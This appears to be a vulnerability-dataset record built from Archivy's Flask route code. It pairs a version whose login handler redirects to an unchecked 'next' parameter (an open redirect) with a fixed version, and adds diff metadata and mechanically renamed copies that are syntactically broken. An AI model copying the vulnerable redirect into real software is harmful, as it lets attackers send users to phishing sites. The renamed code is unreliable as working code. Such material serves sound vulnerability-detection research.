query = f"|{dataobj_id})]]"
backlinks = search(query, strict=True)
# Form for moving data into another folder
move_form = forms.MoveItemForm()
move_form.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
post_title_form = forms.TitleForm()
post_title_form.title.data = dataobj["title"]
# Get all tags
tag_list = get_all_tags()
# and the ones present in this dataobj
embedded_tags = set()
PATTERN = r"(?:^|\n| )#(?:[-_a-zA-ZÀ-ÖØ-öø-ÿ0-9]+)#"
for match in re.finditer(PATTERN, dataobj.content):
embedded_tags.add(match.group(0).replace("#", "").lstrip())
return render_template(
"dataobjs/show.html",
title=dataobj["title"],
dataobj=dataobj,
backlinks=backlinks,
current_path=dataobj["dir"],
form=forms.DeleteDataForm(),
view_only=0,
search_enabled=app.config["SEARCH_CONF"]["enabled"],
post_title_form=post_title_form,
move_form=move_form,
tag_list=tag_list,
embedded_tags=embedded_tags,
titles=titles,
)
@app.route("/dataobj/move/<int:dataobj_id>", methods=["POST"])
def move_item(dataobj_id):
form = forms.MoveItemForm()
out_dir = form.path.data if form.path.data != "" else "root directory"
if form.path.data == None:
flash("No path specified.")
return redirect(f"/dataobj/{dataobj_id}")
try:
if data.move_item(dataobj_id, form.path.data):
flash(f"Data successfully moved to {out_dir}.", "success")
return redirect(f"/dataobj/{dataobj_id}")
else:
flash(f"Data could not be moved to {out_dir}.", "error")
return redirect(f"/dataobj/{dataobj_id}")
except FileNotFoundError:
flash("Data not found.", "error")
return redirect("/")
except FileExistsError:
flash("Data already in target directory.", "error")
return redirect(f"/dataobj/{dataobj_id}")
@app.route("/dataobj/delete/<int:dataobj_id>", methods=["POST"])
def delete_data(dataobj_id):
try:
data.delete_item(dataobj_id)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
@app.route("/login", methods=["GET", "POST"])
def login():
form = forms.UserForm()
if form.validate_on_submit():
db = get_db()
user = db.search(
(Query().username == form.username.data) & (Query().type == "user")
)
if user and check_password_hash(user[0]["hashed_password"], form.password.data):
user = User.from_db(user[0])
login_user(user, remember=True)
flash("Login successful!", "success")
next_url = request.args.get("next")
return redirect(next_url or "/")
flash("Invalid credentials", "error")
return redirect("/login")
return render_template("users/login.html", form=form, title="Login")
@app.route("/logout", methods=["DELETE", "GET"])
def logout():
logout_user()
flash("Logged out successfully", "success")
return redirect("/")
@app.route("/user/edit", methods=["GET", "POST"])
def edit_user():
form = forms.UserForm()
if form.validate_on_submit():
db = get_db()
db.update(
{
"username": form.username.data,
"hashed_password": generate_password_hash(form.password.data),
},
doc_ids=[current_user.id],
)
flash("Information saved!", "success")
return redirect("/")
form.username.data = current_user.username
return render_template("users/edit.html", form=form, title="Edit Profile")
@app.route("/folders/create", methods=["POST"])
def create_folder():
form = forms.NewFolderForm()
if form.validate_on_submit():
path = Path(form.parent_dir.data.strip("/")) / form.new_dir.data
new_path = data.create_dir(str(path))
flash("Folder successfully created.", "success")
return redirect(f"/?path={new_path}")
flash("Could not create folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/delete", methods=["POST"])
def delete_folder():
form = forms.DeleteFolderForm()
if form.validate_on_submit():
if data.delete_dir(form.dir_name.data):
flash("Folder successfully deleted.", "success")
return redirect("/")
else:
flash("Folder not found.", "error")
return redirect(request.referrer or "/", 404)
flash("Could not delete folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/rename", methods=["POST"])
def rename_folder():
form = forms.RenameDirectoryForm()
if form.validate_on_submit():
try:
new_path = data.rename_folder(form.current_path.data, form.new_name.data)
if not new_path:
flash("Invalid input.", "error")
else:
flash("Renamed successfully.", "success")
return redirect(f"/?path={new_path}")
except FileNotFoundError:
flash("Directory not found.", "error")
except FileExistsError:
flash("Target directory exists.", "error")
return redirect("/")
@app.route("/bookmarklet")
def bookmarklet():
return render_template("bookmarklet.html", title="Bookmarklet")
@app.route("/images/<filename>")
def serve_image(filename):
if filename and data.valid_image_filename(filename):
image_path = data.image_exists(filename)
if image_path:
return send_file(image_path)
else:
return "Image not found", 404
else:
return "Invalid file request", 413
@app.route("/static/custom.css")
def custom_css():
if not app.config["THEME_CONF"].get("use_custom_css", False):
return ""
return send_from_directory(
Path(app.config["USER_DIR"]) / "css",
app.config["THEME_CONF"]["custom_css_file"],
)
@app.route("/config", methods=["GET", "POST"])
def config():
"""
Web View to edit and update configuration.
"""
def update_config_value(key, val, dictionary):
if key != "SECRET_KEY":
if type(val) is dict:
for k, v in val.items():
update_config_value(k, v, dictionary[key])
else:
dictionary[key] = val
form = forms.config_form(app.config)
default = vars(Config())
if form.validate_on_submit():
changed_config = Config()
changed_config.override(form.data)
for k, v in vars(changed_config).items():
# propagate changes to configuration
update_config_value(k, v, app.config)
write_config(vars(changed_config)) # save to filesystem config
flash("Config successfully updated.", "success")
elif request.method == "POST":
flash("Could not update config.", "error")
return render_template(
"config.html", conf=form, default=default, title="Edit Config"
)
@csrf.exempt # exempt from CSRF to be able to submit info directly from bookmarklet
@app.route("/save_from_bookmarklet", methods=["POST"])
def save_raw_url():
"""
Used in the bookmarklet - Saves a URL by taking its raw HTML.
POST parameters:
- html
- url
"""
html = request.form.get("html")
if not html:
return "No HTML provided", 400
bookmark = DataObj(url=request.form.get("url"), type="bookmark")
bookmark.process_bookmark_url(html)
if bookmark.insert():
return redirect(f"/dataobj/{bookmark.id}")
else:
return "Could not save bookmark", 500
| from pathlib import Path
from os.path import sep
from pkg_resources import require
from shutil import which
import frontmatter
from flask import (
render_template,
flash,
redirect,
request,
url_for,
send_file,
send_from_directory,
)
from flask_login import login_user, current_user, logout_user
from tinydb import Query
from werkzeug.security import check_password_hash, generate_password_hash
from archivy.models import DataObj, User
from archivy import data, app, forms, csrf
from archivy.helpers import get_db, write_config, is_safe_redirect_url
from archivy.tags import get_all_tags
from archivy.search import search, search_frontmatter_tags
from archivy.config import Config
import re
@app.context_processor
def pass_defaults():
dataobjs = data.get_items(load_content=False)
version = require("archivy")[0].version
SEP = sep
# check windows parsing for js (https://github.com/Uzay-G/archivy/issues/115)
if SEP == "\\":
SEP += "\\"
return dict(dataobjs=dataobjs, SEP=SEP, version=version)
@app.before_request
def check_perms():
allowed_path = (
request.path.startswith("/login")
or request.path.startswith("/static")
or request.path.startswith("/api/login")
)
if not current_user.is_authenticated and not allowed_path:
return redirect(url_for("login", next=request.path))
return
@app.route("/")
@app.route("/index")
def index():
path = request.args.get("path", "").lstrip("/")
try:
files = data.get_items(path=path)
except FileNotFoundError:
flash("Directory does not exist.", "error")
return redirect("/")
return render_template(
"home.html",
title=path or "root",
search_enabled=app.config["SEARCH_CONF"]["enabled"],
dir=files,
current_path=path,
new_folder_form=forms.NewFolderForm(),
delete_form=forms.DeleteFolderForm(),
rename_form=forms.RenameDirectoryForm(),
view_only=0,
search_engine=app.config["SEARCH_CONF"]["engine"],
)
# TODO: refactor two following methods
@app.route("/bookmarks/new", methods=["GET", "POST"])
def new_bookmark():
default_dir = app.config.get("DEFAULT_BOOKMARKS_DIR", "root directory")
form = forms.NewBookmarkForm(path=default_dir)
form.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if form.validate_on_submit():
path = form.path.data
tags = form.tags.data.split(",") if form.tags.data != "" else []
tags = [tag.strip() for tag in tags]
bookmark = DataObj(url=form.url.data, tags=tags, path=path, type="bookmark")
bookmark.process_bookmark_url()
bookmark_id = bookmark.insert()
if bookmark_id:
flash("Bookmark Saved!", "success")
return redirect(f"/dataobj/{bookmark_id}")
else:
flash(bookmark.error, "error")
return redirect("/bookmarks/new")
# for bookmarklet
form.url.data = request.args.get("url", "")
path = request.args.get("path", default_dir).strip("/")
# handle empty argument
form.path.data = path
return render_template("dataobjs/new.html", title="New Bookmark", form=form)
@app.route("/notes/new", methods=["GET", "POST"])
def new_note():
form = forms.NewNoteForm()
default_dir = "root directory"
form.path.choices = [("", default_dir)] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if form.validate_on_submit():
path = form.path.data
tags = form.tags.data.split(",") if form.tags.data != "" else []
tags = [tag.strip() for tag in tags]
note = DataObj(title=form.title.data, path=path, tags=tags, type="note")
note_id = note.insert()
if note_id:
flash("Note Saved!", "success")
return redirect(f"/dataobj/{note_id}")
path = request.args.get("path", default_dir).strip("/")
# handle empty argument
form.path.data = path
return render_template("/dataobjs/new.html", title="New Note", form=form)
@app.route("/tags")
def show_all_tags():
if not app.config["SEARCH_CONF"]["engine"] == "ripgrep" and not which("rg"):
flash("Ripgrep must be installed to view pages about embedded tags.", "error")
return redirect("/")
tags = sorted(get_all_tags(force=True))
return render_template("tags/all.html", title="All Tags", tags=tags)
@app.route("/tags/<tag_name>")
def show_tag(tag_name):
if not app.config["SEARCH_CONF"]["enabled"] and not which("rg"):
flash(
"Search (for example ripgrep) must be installed to view pages about embedded tags.",
"error",
)
return redirect("/")
results = search(f"#{tag_name}#", strict=True)
res_ids = set(
[item["id"] for item in results]
) # avoid duplication of results between context-aware embedded tags and metadata ones
for res in search_frontmatter_tags(tag_name):
if res["id"] not in res_ids:
results.append(res)
return render_template(
"tags/show.html",
title=f"Tags - {tag_name}",
tag_name=tag_name,
search_result=results,
)
@app.route("/dataobj/<int:dataobj_id>")
def show_dataobj(dataobj_id):
dataobj = data.get_item(dataobj_id)
get_title_id_pairs = lambda x: (x["title"], x["id"])
titles = list(
map(get_title_id_pairs, data.get_items(structured=False, load_content=False))
)
if not dataobj:
flash("Data could not be found!", "error")
return redirect("/")
if request.args.get("raw") == "1":
return frontmatter.dumps(dataobj)
backlinks = []
if app.config["SEARCH_CONF"]["enabled"]:
if app.config["SEARCH_CONF"]["engine"] == "ripgrep":
query = f"\|{dataobj_id}]]"
else:
query = f"|{dataobj_id})]]"
backlinks = search(query, strict=True)
# Form for moving data into another folder
move_form = forms.MoveItemForm()
move_form.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
post_title_form = forms.TitleForm()
post_title_form.title.data = dataobj["title"]
# Get all tags
tag_list = get_all_tags()
# and the ones present in this dataobj
embedded_tags = set()
PATTERN = r"(?:^|\n| )#(?:[-_a-zA-ZÀ-ÖØ-öø-ÿ0-9]+)#"
for match in re.finditer(PATTERN, dataobj.content):
embedded_tags.add(match.group(0).replace("#", "").lstrip())
return render_template(
"dataobjs/show.html",
title=dataobj["title"],
dataobj=dataobj,
backlinks=backlinks,
current_path=dataobj["dir"],
form=forms.DeleteDataForm(),
view_only=0,
search_enabled=app.config["SEARCH_CONF"]["enabled"],
post_title_form=post_title_form,
move_form=move_form,
tag_list=tag_list,
embedded_tags=embedded_tags,
titles=titles,
)
@app.route("/dataobj/move/<int:dataobj_id>", methods=["POST"])
def move_item(dataobj_id):
form = forms.MoveItemForm()
out_dir = form.path.data if form.path.data != "" else "root directory"
if form.path.data == None:
flash("No path specified.")
return redirect(f"/dataobj/{dataobj_id}")
try:
if data.move_item(dataobj_id, form.path.data):
flash(f"Data successfully moved to {out_dir}.", "success")
return redirect(f"/dataobj/{dataobj_id}")
else:
flash(f"Data could not be moved to {out_dir}.", "error")
return redirect(f"/dataobj/{dataobj_id}")
except FileNotFoundError:
flash("Data not found.", "error")
return redirect("/")
except FileExistsError:
flash("Data already in target directory.", "error")
return redirect(f"/dataobj/{dataobj_id}")
@app.route("/dataobj/delete/<int:dataobj_id>", methods=["POST"])
def delete_data(dataobj_id):
try:
data.delete_item(dataobj_id)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
@app.route("/login", methods=["GET", "POST"])
def login():
form = forms.UserForm()
if form.validate_on_submit():
db = get_db()
user = db.search(
(Query().username == form.username.data) & (Query().type == "user")
)
if user and check_password_hash(user[0]["hashed_password"], form.password.data):
user = User.from_db(user[0])
login_user(user, remember=True)
flash("Login successful!", "success")
next_url = request.args.get("next")
if next_url and is_safe_redirect_url(next_url):
return redirect(next_url)
else:
return redirect("/")
flash("Invalid credentials", "error")
return redirect("/login")
return render_template("users/login.html", form=form, title="Login")
@app.route("/logout", methods=["DELETE", "GET"])
def logout():
logout_user()
flash("Logged out successfully", "success")
return redirect("/")
@app.route("/user/edit", methods=["GET", "POST"])
def edit_user():
form = forms.UserForm()
if form.validate_on_submit():
db = get_db()
db.update(
{
"username": form.username.data,
"hashed_password": generate_password_hash(form.password.data),
},
doc_ids=[current_user.id],
)
flash("Information saved!", "success")
return redirect("/")
form.username.data = current_user.username
return render_template("users/edit.html", form=form, title="Edit Profile")
@app.route("/folders/create", methods=["POST"])
def create_folder():
form = forms.NewFolderForm()
if form.validate_on_submit():
path = Path(form.parent_dir.data.strip("/")) / form.new_dir.data
new_path = data.create_dir(str(path))
flash("Folder successfully created.", "success")
return redirect(f"/?path={new_path}")
flash("Could not create folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/delete", methods=["POST"])
def delete_folder():
form = forms.DeleteFolderForm()
if form.validate_on_submit():
if data.delete_dir(form.dir_name.data):
flash("Folder successfully deleted.", "success")
return redirect("/")
else:
flash("Folder not found.", "error")
return redirect(request.referrer or "/", 404)
flash("Could not delete folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/rename", methods=["POST"])
def rename_folder():
form = forms.RenameDirectoryForm()
if form.validate_on_submit():
try:
new_path = data.rename_folder(form.current_path.data, form.new_name.data)
if not new_path:
flash("Invalid input.", "error")
else:
flash("Renamed successfully.", "success")
return redirect(f"/?path={new_path}")
except FileNotFoundError:
flash("Directory not found.", "error")
except FileExistsError:
flash("Target directory exists.", "error")
return redirect("/")
@app.route("/bookmarklet")
def bookmarklet():
return render_template("bookmarklet.html", title="Bookmarklet")
@app.route("/images/<filename>")
def serve_image(filename):
if filename and data.valid_image_filename(filename):
image_path = data.image_exists(filename)
if image_path:
return send_file(image_path)
else:
return "Image not found", 404
else:
return "Invalid file request", 413
@app.route("/static/custom.css")
def custom_css():
if not app.config["THEME_CONF"].get("use_custom_css", False):
return ""
return send_from_directory(
Path(app.config["USER_DIR"]) / "css",
app.config["THEME_CONF"]["custom_css_file"],
)
@app.route("/config", methods=["GET", "POST"])
def config():
"""
Web View to edit and update configuration.
"""
def update_config_value(key, val, dictionary):
if key != "SECRET_KEY":
if type(val) is dict:
for k, v in val.items():
update_config_value(k, v, dictionary[key])
else:
dictionary[key] = val
form = forms.config_form(app.config)
default = vars(Config())
if form.validate_on_submit():
changed_config = Config()
changed_config.override(form.data)
for k, v in vars(changed_config).items():
# propagate changes to configuration
update_config_value(k, v, app.config)
write_config(vars(changed_config)) # save to filesystem config
flash("Config successfully updated.", "success")
elif request.method == "POST":
flash("Could not update config.", "error")
return render_template(
"config.html", conf=form, default=default, title="Edit Config"
)
@csrf.exempt # exempt from CSRF to be able to submit info directly from bookmarklet
@app.route("/save_from_bookmarklet", methods=["POST"])
def save_raw_url():
"""
Used in the bookmarklet - Saves a URL by taking its raw HTML.
POST parameters:
- html
- url
"""
html = request.form.get("html")
if not html:
return "No HTML provided", 400
bookmark = DataObj(url=request.form.get("url"), type="bookmark")
bookmark.process_bookmark_url(html)
if bookmark.insert():
return redirect(f"/dataobj/{bookmark.id}")
else:
return "Could not save bookmark", 500
| open_redirect | {
"code": [
"from archivy.helpers import get_db, write_config",
" return redirect(next_url or \"/\")"
],
"line_no": [
22,
267
]
} | {
"code": [
"from archivy.helpers import get_db, write_config, is_safe_redirect_url",
" if next_url and is_safe_redirect_url(next_url):",
" else:",
" return redirect(\"/\")"
],
"line_no": [
22,
267,
269,
270
]
} | from pathlib import Path
from os.path import sep
from pkg_resources import require
from shutil import which
import frontmatter
from flask import (
render_template,
flash,
redirect,
request,
url_for,
send_file,
send_from_directory,
)
from flask_login import .login_user, current_user, logout_user
from tinydb import Query
from werkzeug.security import check_password_hash, generate_password_hash
from archivy.models import DataObj, User
from archivy import data, app, forms, csrf
from archivy.helpers import get_db, write_config
from archivy.tags import get_all_tags
from archivy.search import search, search_frontmatter_tags
from archivy.config import Config
import re
@app.context_processor
def FUNC_0():
VAR_3 = data.get_items(load_content=False)
VAR_4 = require("archivy")[0].version
VAR_5 = sep
if VAR_5 == "\\":
VAR_5 += "\\"
return dict(VAR_3=dataobjs, VAR_5=SEP, VAR_4=version)
@app.before_request
def FUNC_1():
VAR_6 = (
request.path.startswith("/login")
or request.path.startswith("/static")
or request.path.startswith("/api/login")
)
if not current_user.is_authenticated and not VAR_6:
return redirect(url_for("login", next=request.path))
return
@app.route("/")
@app.route("/index")
def FUNC_2():
VAR_7 = request.args.get("path", "").lstrip("/")
try:
VAR_29 = data.get_items(VAR_7=path)
except FileNotFoundError:
flash("Directory does not exist.", "error")
return redirect("/")
return render_template(
"home.html",
title=VAR_7 or "root",
search_enabled=app.config["SEARCH_CONF"]["enabled"],
dir=VAR_29,
current_path=VAR_7,
new_folder_form=forms.NewFolderForm(),
delete_form=forms.DeleteFolderForm(),
rename_form=forms.RenameDirectoryForm(),
view_only=0,
search_engine=app.config["SEARCH_CONF"]["engine"],
)
@app.route("/bookmarks/new", methods=["GET", "POST"])
def FUNC_3():
VAR_8 = app.config.get("DEFAULT_BOOKMARKS_DIR", "root directory")
VAR_9 = forms.NewBookmarkForm(VAR_7=VAR_8)
VAR_9.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if VAR_9.validate_on_submit():
VAR_7 = VAR_9.path.data
VAR_10 = VAR_9.tags.data.split(",") if VAR_9.tags.data != "" else []
VAR_10 = [tag.strip() for tag in VAR_10]
VAR_28 = DataObj(url=VAR_9.url.data, VAR_10=tags, VAR_7=path, type="bookmark")
VAR_28.process_bookmark_url()
VAR_30 = VAR_28.insert()
if VAR_30:
flash("Bookmark Saved!", "success")
return redirect(f"/VAR_13/{VAR_30}")
else:
flash(VAR_28.error, "error")
return redirect("/bookmarks/new")
VAR_9.url.data = request.args.get("url", "")
VAR_7 = request.args.get("path", VAR_8).strip("/")
VAR_9.path.data = VAR_7
return render_template("dataobjs/new.html", title="New Bookmark", VAR_9=form)
@app.route("/notes/new", methods=["GET", "POST"])
def FUNC_4():
VAR_9 = forms.NewNoteForm()
VAR_8 = "root directory"
VAR_9.path.choices = [("", VAR_8)] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if VAR_9.validate_on_submit():
VAR_7 = VAR_9.path.data
VAR_10 = VAR_9.tags.data.split(",") if VAR_9.tags.data != "" else []
VAR_10 = [tag.strip() for tag in VAR_10]
VAR_31 = DataObj(title=VAR_9.title.data, VAR_7=path, VAR_10=tags, type="note")
VAR_32 = VAR_31.insert()
if VAR_32:
flash("Note Saved!", "success")
return redirect(f"/VAR_13/{VAR_32}")
VAR_7 = request.args.get("path", VAR_8).strip("/")
VAR_9.path.data = VAR_7
return render_template("/VAR_3/new.html", title="New Note", VAR_9=form)
@app.route("/tags")
def FUNC_5():
if not app.config["SEARCH_CONF"]["engine"] == "ripgrep" and not which("rg"):
flash("Ripgrep must be installed to view pages about embedded VAR_10.", "error")
return redirect("/")
VAR_10 = sorted(get_all_tags(force=True))
return render_template("tags/all.html", title="All Tags", VAR_10=tags)
@app.route("/VAR_10/<VAR_0>")
def FUNC_6(VAR_0):
if not app.config["SEARCH_CONF"]["enabled"] and not which("rg"):
flash(
"Search (for example ripgrep) must be installed to view pages about embedded VAR_10.",
"error",
)
return redirect("/")
VAR_11 = search(f"#{VAR_0}#", strict=True)
VAR_12 = set(
[item["id"] for item in VAR_11]
) # avoid duplication of VAR_11 between context-aware embedded VAR_10 and metadata ones
for res in search_frontmatter_tags(VAR_0):
if res["id"] not in VAR_12:
VAR_11.append(res)
return render_template(
"tags/show.html",
title=f"Tags - {VAR_0}",
VAR_0=tag_name,
search_result=VAR_11,
)
@app.route("/VAR_13/<int:VAR_1>")
def FUNC_7(VAR_1):
VAR_13 = data.get_item(VAR_1)
VAR_14 = lambda x: (x["title"], x["id"])
VAR_15 = list(
map(VAR_14, data.get_items(structured=False, load_content=False))
)
if not VAR_13:
flash("Data could not be found!", "error")
return redirect("/")
if request.args.get("raw") == "1":
return frontmatter.dumps(VAR_13)
VAR_16 = []
if app.config["SEARCH_CONF"]["enabled"]:
if app.config["SEARCH_CONF"]["engine"] == "ripgrep":
VAR_38 = f"\|{VAR_1}]]"
else:
VAR_38 = f"|{VAR_1})]]"
VAR_16 = search(VAR_38, strict=True)
VAR_17 = forms.MoveItemForm()
VAR_17.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
VAR_18 = forms.TitleForm()
VAR_18.title.data = VAR_13["title"]
VAR_19 = get_all_tags()
VAR_20 = set()
VAR_21 = r"(?:^|\n| )#(?:[-_a-zA-ZÀ-ÖØ-öø-ÿ0-9]+)#"
for match in re.finditer(VAR_21, VAR_13.content):
VAR_20.add(match.group(0).replace("#", "").lstrip())
return render_template(
"dataobjs/show.html",
title=VAR_13["title"],
VAR_13=dataobj,
VAR_16=backlinks,
current_path=VAR_13["dir"],
VAR_9=forms.DeleteDataForm(),
view_only=0,
search_enabled=app.config["SEARCH_CONF"]["enabled"],
VAR_18=post_title_form,
VAR_17=move_form,
VAR_19=tag_list,
VAR_20=embedded_tags,
VAR_15=titles,
)
@app.route("/VAR_13/move/<int:VAR_1>", methods=["POST"])
def FUNC_8(VAR_1):
VAR_9 = forms.MoveItemForm()
VAR_22 = VAR_9.path.data if VAR_9.path.data != "" else "root directory"
if VAR_9.path.data == None:
flash("No VAR_7 specified.")
return redirect(f"/VAR_13/{VAR_1}")
try:
if data.move_item(VAR_1, VAR_9.path.data):
flash(f"Data successfully moved to {VAR_22}.", "success")
return redirect(f"/VAR_13/{VAR_1}")
else:
flash(f"Data could not be moved to {VAR_22}.", "error")
return redirect(f"/VAR_13/{VAR_1}")
except FileNotFoundError:
flash("Data not found.", "error")
return redirect("/")
except FileExistsError:
flash("Data already in target directory.", "error")
return redirect(f"/VAR_13/{VAR_1}")
@app.route("/VAR_13/delete/<int:VAR_1>", methods=["POST"])
def FUNC_9(VAR_1):
try:
data.delete_item(VAR_1)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
@app.route("/login", methods=["GET", "POST"])
def FUNC_10():
VAR_9 = forms.UserForm()
if VAR_9.validate_on_submit():
VAR_33 = get_db()
VAR_34 = VAR_33.search(
(Query().username == VAR_9.username.data) & (Query().type == "user")
)
if VAR_34 and check_password_hash(VAR_34[0]["hashed_password"], VAR_9.password.data):
VAR_34 = User.from_db(VAR_34[0])
login_user(VAR_34, remember=True)
flash("Login successful!", "success")
VAR_39 = request.args.get("next")
return redirect(VAR_39 or "/")
flash("Invalid credentials", "error")
return redirect("/login")
return render_template("users/FUNC_10.html", VAR_9=VAR_9, title="Login")
@app.route("/logout", methods=["DELETE", "GET"])
def FUNC_11():
logout_user()
flash("Logged out successfully", "success")
return redirect("/")
@app.route("/VAR_34/edit", methods=["GET", "POST"])
def FUNC_12():
VAR_9 = forms.UserForm()
if VAR_9.validate_on_submit():
VAR_33 = get_db()
VAR_33.update(
{
"username": VAR_9.username.data,
"hashed_password": generate_password_hash(VAR_9.password.data),
},
doc_ids=[current_user.id],
)
flash("Information saved!", "success")
return redirect("/")
VAR_9.username.data = current_user.username
return render_template("users/edit.html", VAR_9=VAR_9, title="Edit Profile")
@app.route("/folders/create", methods=["POST"])
def FUNC_13():
VAR_9 = forms.NewFolderForm()
if VAR_9.validate_on_submit():
VAR_7 = Path(VAR_9.parent_dir.data.strip("/")) / VAR_9.new_dir.data
VAR_35 = data.create_dir(str(VAR_7))
flash("Folder successfully created.", "success")
return redirect(f"/?VAR_7={VAR_35}")
flash("Could not create folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/delete", methods=["POST"])
def FUNC_14():
VAR_9 = forms.DeleteFolderForm()
if VAR_9.validate_on_submit():
if data.delete_dir(VAR_9.dir_name.data):
flash("Folder successfully deleted.", "success")
return redirect("/")
else:
flash("Folder not found.", "error")
return redirect(request.referrer or "/", 404)
flash("Could not delete folder.", "error")
return redirect(request.referrer or "/")
@app.route("/folders/rename", methods=["POST"])
def FUNC_15():
VAR_9 = forms.RenameDirectoryForm()
if VAR_9.validate_on_submit():
try:
VAR_35 = data.rename_folder(VAR_9.current_path.data, VAR_9.new_name.data)
if not VAR_35:
flash("Invalid input.", "error")
else:
flash("Renamed successfully.", "success")
return redirect(f"/?VAR_7={VAR_35}")
except FileNotFoundError:
flash("Directory not found.", "error")
except FileExistsError:
flash("Target directory exists.", "error")
return redirect("/")
@app.route("/bookmarklet")
def FUNC_16():
return render_template("bookmarklet.html", title="Bookmarklet")
@app.route("/images/<VAR_2>")
def FUNC_17(VAR_2):
if VAR_2 and data.valid_image_filename(VAR_2):
VAR_36 = data.image_exists(VAR_2)
if VAR_36:
return send_file(VAR_36)
else:
return "Image not found", 404
else:
return "Invalid file request", 413
@app.route("/static/custom.css")
def FUNC_18():
if not app.config["THEME_CONF"].get("use_custom_css", False):
return ""
return send_from_directory(
Path(app.config["USER_DIR"]) / "css",
app.config["THEME_CONF"]["custom_css_file"],
)
@app.route("/config", methods=["GET", "POST"])
def FUNC_19():
def FUNC_21(VAR_23, VAR_24, VAR_25):
if VAR_23 != "SECRET_KEY":
if type(VAR_24) is dict:
for k, v in VAR_24.items():
FUNC_21(k, v, VAR_25[VAR_23])
else:
VAR_25[VAR_23] = VAR_24
VAR_9 = forms.config_form(app.config)
VAR_26 = vars(Config())
if VAR_9.validate_on_submit():
VAR_37 = Config()
VAR_37.override(VAR_9.data)
for k, v in vars(VAR_37).items():
FUNC_21(k, v, app.config)
write_config(vars(VAR_37)) # save to filesystem FUNC_19
flash("Config successfully updated.", "success")
elif request.method == "POST":
flash("Could not update FUNC_19.", "error")
return render_template(
"config.html", conf=VAR_9, VAR_26=default, title="Edit Config"
)
@csrf.exempt # exempt from CSRF to be able to submit info directly from FUNC_16
@app.route("/save_from_bookmarklet", methods=["POST"])
def FUNC_20():
VAR_27 = request.form.get("html")
if not VAR_27:
return "No HTML provided", 400
VAR_28 = DataObj(url=request.form.get("url"), type="bookmark")
VAR_28.process_bookmark_url(VAR_27)
if VAR_28.insert():
return redirect(f"/VAR_13/{VAR_28.id}")
else:
return "Could not save bookmark", 500
| from pathlib import Path
from os.path import sep
from pkg_resources import require
from shutil import which
import frontmatter
from flask import (
render_template,
flash,
redirect,
request,
url_for,
send_file,
send_from_directory,
)
from flask_login import .login_user, current_user, logout_user
from tinydb import Query
from werkzeug.security import check_password_hash, generate_password_hash
from archivy.models import DataObj, User
from archivy import data, app, forms, csrf
from archivy.helpers import get_db, write_config, is_safe_redirect_url
from archivy.tags import get_all_tags
from archivy.search import search, search_frontmatter_tags
from archivy.config import Config
import re
@app.context_processor
def FUNC_0():
VAR_3 = data.get_items(load_content=False)
VAR_4 = require("archivy")[0].version
VAR_5 = sep
if VAR_5 == "\\":
VAR_5 += "\\"
return dict(VAR_3=dataobjs, VAR_5=SEP, VAR_4=version)
@app.before_request
def FUNC_1():
VAR_6 = (
request.path.startswith("/login")
or request.path.startswith("/static")
or request.path.startswith("/api/login")
)
if not current_user.is_authenticated and not VAR_6:
return redirect(url_for("login", next=request.path))
return
@app.route("/")
@app.route("/index")
def FUNC_2():
VAR_7 = request.args.get("path", "").lstrip("/")
try:
VAR_29 = data.get_items(VAR_7=path)
except FileNotFoundError:
flash("Directory does not exist.", "error")
return redirect("/")
return render_template(
"home.html",
title=VAR_7 or "root",
search_enabled=app.config["SEARCH_CONF"]["enabled"],
dir=VAR_29,
current_path=VAR_7,
new_folder_form=forms.NewFolderForm(),
delete_form=forms.DeleteFolderForm(),
rename_form=forms.RenameDirectoryForm(),
view_only=0,
search_engine=app.config["SEARCH_CONF"]["engine"],
)
@app.route("/bookmarks/new", methods=["GET", "POST"])
def FUNC_3():
VAR_8 = app.config.get("DEFAULT_BOOKMARKS_DIR", "root directory")
VAR_9 = forms.NewBookmarkForm(VAR_7=VAR_8)
VAR_9.path.choices = [("", "root directory")] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if VAR_9.validate_on_submit():
VAR_7 = VAR_9.path.data
VAR_10 = VAR_9.tags.data.split(",") if VAR_9.tags.data != "" else []
VAR_10 = [tag.strip() for tag in VAR_10]
VAR_28 = DataObj(url=VAR_9.url.data, VAR_10=tags, VAR_7=path, type="bookmark")
VAR_28.process_bookmark_url()
VAR_30 = VAR_28.insert()
if VAR_30:
flash("Bookmark Saved!", "success")
return redirect(f"/VAR_13/{VAR_30}")
else:
flash(VAR_28.error, "error")
return redirect("/bookmarks/new")
VAR_9.url.data = request.args.get("url", "")
VAR_7 = request.args.get("path", VAR_8).strip("/")
VAR_9.path.data = VAR_7
return render_template("dataobjs/new.html", title="New Bookmark", VAR_9=form)
@app.route("/notes/new", methods=["GET", "POST"])
def FUNC_4():
VAR_9 = forms.NewNoteForm()
VAR_8 = "root directory"
VAR_9.path.choices = [("", VAR_8)] + [
(pathname, pathname) for pathname in data.get_dirs()
]
if VAR_9.validate_on_submit():
VAR_7 = VAR_9.path.data
VAR_10 = VAR_9.tags.data.split(",") if VAR_9.tags.data != "" else []
VAR_10 = [tag.strip() for tag in VAR_10]
VAR_31 = DataObj(title=VAR_9.title.data, VAR_7=path, VAR_10=tags, type="note")
VAR_32 = VAR_31.insert()
if VAR_32:
flash("Note Saved!", "success")
return redirect(f"/VAR_13/{VAR_32}")
VAR_7 = request.args.get("path", VAR_8).strip("/")
VAR_9.path.data = VAR_7
return render_template("/VAR_3/new.html", title="New Note", VAR_9=form)
@app.route("/tags")
def FUNC_5():
if not app.config["SEARCH_CONF"]["engine"] == "ripgrep" and not which("rg"):
flash("Ripgrep must be installed to view pages about embedded VAR_10.", "error")
return redirect("/")
